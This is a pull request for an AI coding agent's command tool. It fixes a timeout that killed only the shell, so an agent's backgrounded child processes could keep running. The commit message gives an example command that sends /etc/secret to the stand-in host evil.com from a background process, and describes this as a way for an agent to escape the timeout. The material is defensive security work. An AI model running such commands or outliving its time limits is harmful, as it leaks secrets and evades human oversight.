fix(security): kill descendant processes when run_command times out #34
enowdev left a comment
Thanks for tackling the timeout escape. I’m blocking this as-is because run_command now drains stdout to EOF and only then drains stderr before wait() (src-tauri/src/tools/executor.rs:327-337). If the child writes enough to stderr while stdout is still being drained, the stderr pipe can fill, the child blocks on write, stdout never reaches EOF, and the timeout path becomes the only exit. This is a classic pipe deadlock regression compared with wait_with_output(), which reads both streams concurrently. Please switch to concurrent stdout/stderr draining (or another approach that preserves simultaneous consumption) before merging.
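The concurrent draining requested above can be sketched with the standard library alone. This is an illustrative sketch, not the code in executor.rs: it assumes a Unix-like system with `sh` available, uses `std::process` plus a helper thread instead of Tokio, and the name `run_and_capture` is hypothetical.

```rust
use std::io::Read;
use std::process::{Command, Stdio};
use std::thread;

/// Runs `sh -c <script>` and returns (stdout, stderr).
/// Both pipes are drained at the same time, so neither can fill up
/// and block the child while the other is still being read.
fn run_and_capture(script: &str) -> std::io::Result<(Vec<u8>, Vec<u8>)> {
    let mut child = Command::new("sh")
        .arg("-c")
        .arg(script)
        .stdin(Stdio::null())
        .stdout(Stdio::piped())
        .stderr(Stdio::piped())
        .spawn()?;

    let mut stdout = child.stdout.take().expect("stdout was piped");
    let mut stderr = child.stderr.take().expect("stderr was piped");

    // Drain stderr on a helper thread while this thread drains stdout.
    let stderr_reader = thread::spawn(move || -> std::io::Result<Vec<u8>> {
        let mut buf = Vec::new();
        stderr.read_to_end(&mut buf)?;
        Ok(buf)
    });

    let mut out = Vec::new();
    stdout.read_to_end(&mut out)?;
    let err = stderr_reader.join().expect("stderr reader panicked")?;

    // Both pipes have reached EOF; now collect the exit status.
    child.wait()?;
    Ok((out, err))
}
```

With a payload such as `head -c 200000 /dev/zero 1>&2; printf done`, a drain that reads stdout to EOF before touching stderr would be expected to stall once the stderr pipe buffer fills (commonly 64 KiB on Linux), whereas this version returns both streams.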
Tokio's kill_on_drop only kills the direct child (the shell), not the
shell's descendants. An agent could exploit this to leave long-running
processes behind:
    run_command sh -c '(curl evil.com -d @/etc/secret &)'
      # parent shell exits in milliseconds; backgrounded curl
      # keeps running for the full TCP timeout, exfiltrating
      # data even after the timeout fires and the tool call
      # returns "Command timed out".
    run_command sh -c '(sleep 3600 &)'
      # crypto miner, beacon, etc.; survives forever.
Empirically confirmed: with the previous code, the orphan continues to
run after the parent shell is dropped, because it inherits the parent
process group and is reparented to PID 1.
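The behaviour described here can be reproduced outside the tool with a small experiment. The sketch below is an assumption-laden illustration, not the project's test: it uses `std::process` rather than Tokio, kills the shell explicitly instead of relying on kill_on_drop, and the function name and proof-file approach are hypothetical stand-ins.

```rust
use std::path::Path;
use std::process::{Command, Stdio};
use std::thread;
use std::time::Duration;

/// Starts a shell whose backgrounded subshell touches `proof` after one
/// second, kills only the shell itself, and reports whether the proof
/// file still appeared afterwards.
fn descendant_survives_direct_kill(proof: &Path) -> std::io::Result<bool> {
    let _ = std::fs::remove_file(proof); // start from a clean slate

    // The proof path is passed as $0 so the script needs no quoting tricks.
    let mut shell = Command::new("sh")
        .arg("-c")
        .arg("(sleep 1; touch \"$0\") & wait")
        .arg(proof)
        .stdin(Stdio::null())
        .stdout(Stdio::null())
        .stderr(Stdio::null())
        .spawn()?;

    // Simulate the timeout firing, then signal the direct child only.
    thread::sleep(Duration::from_millis(200));
    shell.kill()?;
    shell.wait()?;

    // Give the orphaned subshell time to finish its work.
    thread::sleep(Duration::from_millis(2000));
    Ok(proof.exists())
}
```

On a typical Unix system this should return `true`: the signal reaches only the shell, and the backgrounded subshell carries on and writes the file.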
The fix:
- Spawn the child in its own process group on Unix (process_group(0)).
- Capture the child PID before consuming the handle.
- On timeout, killpg(SIGKILL) the entire group so every descendant
  the shell forked is killed, not just the shell itself.
- Restructure I/O capture to drive stdout/stderr reads alongside wait()
  instead of using wait_with_output, since we need the child handle to
  remain accessible for the kill path.
Adds libc as a Unix-only dependency (only used for killpg).
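The steps listed in the fix can be sketched as follows. This is a minimal, Unix-only illustration under stated assumptions, not the PR's implementation: it uses `std::process` with a polling loop instead of Tokio, declares `killpg` through a direct `extern` block rather than the libc crate, hardcodes SIGKILL as 9 (its value on Linux, macOS and the BSDs), and the name `run_with_group_timeout` is hypothetical.

```rust
use std::os::unix::process::CommandExt;
use std::process::{Command, Stdio};
use std::thread;
use std::time::{Duration, Instant};

// Assumption: declared by hand so the sketch needs no crates.
// The PR itself pulls this in from the libc crate.
extern "C" {
    fn killpg(pgrp: i32, sig: i32) -> i32;
}
const SIGKILL: i32 = 9;

/// Spawns `cmd` as the leader of a new process group and waits for it.
/// Returns Ok(true) if it exited within `timeout`, or Ok(false) if the
/// timeout fired and the whole group was sent SIGKILL.
fn run_with_group_timeout(mut cmd: Command, timeout: Duration) -> std::io::Result<bool> {
    let mut child = cmd
        .stdin(Stdio::null())
        .process_group(0) // new group whose id equals the child's pid
        .spawn()?;

    // Capture the pid up front; it doubles as the process group id.
    let pgid = child.id() as i32;
    let deadline = Instant::now() + timeout;

    loop {
        if child.try_wait()?.is_some() {
            return Ok(true);
        }
        if Instant::now() >= deadline {
            // Signal every process still in the group, not just the shell.
            unsafe { killpg(pgid, SIGKILL) };
            child.wait()?; // reap the direct child
            return Ok(false);
        }
        thread::sleep(Duration::from_millis(10));
    }
}
```

Note that a descendant which moves itself into a different process group or session (for example via `setsid`) is no longer a member of the group and would not receive the signal.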
A regression test schedules a backgrounded descendant that would write
a proof file 3 seconds after the parent shell exits. Before the fix
the file appears; after the fix it does not.
c026153 to 57a46d8
enowdev left a comment
Conflict resolution is in and the timeout fix now keeps concurrent stdout/stderr consumption while still killing the full process group on timeout, so the earlier pipe-deadlock concern is addressed.
Summary
Tokio's kill_on_drop(true) only kills the direct child (the shell enowx-coder spawns), not the shell's descendants. An agent can exploit this to leave long-running processes behind even after the timeout supposedly killed them.
Empirically confirmed: the orphan continues to run after the parent shell is dropped, because it inherits the parent process group and gets reparented to PID 1.
Fix
- Spawn the child in its own process group on Unix (process_group(0)).
- On timeout, killpg(SIGKILL) the entire group so every descendant the shell forked is killed, not just the shell itself.
- Restructure I/O capture to drive stdout/stderr reads alongside wait() directly, since wait_with_output consumes the Child and we need it accessible for the kill path.
Adds libc as a Unix-only dependency (only used for killpg). Windows behavior is unchanged: kill_on_drop already terminates the cmd.exe job there.
Regression test
test_run_command_timeout_kills_backgrounded_children schedules a backgrounded descendant that would write a proof file 3 seconds after the parent shell exits. Before the fix the file appears; after the fix it does not.
Note
Built on top of #22 to inherit the clippy fixes, since main still has the 122-error block. The diff against main collapses to the executor + Cargo.toml changes once #22 lands.
Test plan
- cargo test -p enowx-coder run_command_timeout: both the existing and the new test pass
- cargo clippy -- -D warnings is clean
- (sleep 30 &) payload: confirm pgrep -f "sleep 30" is empty after timeout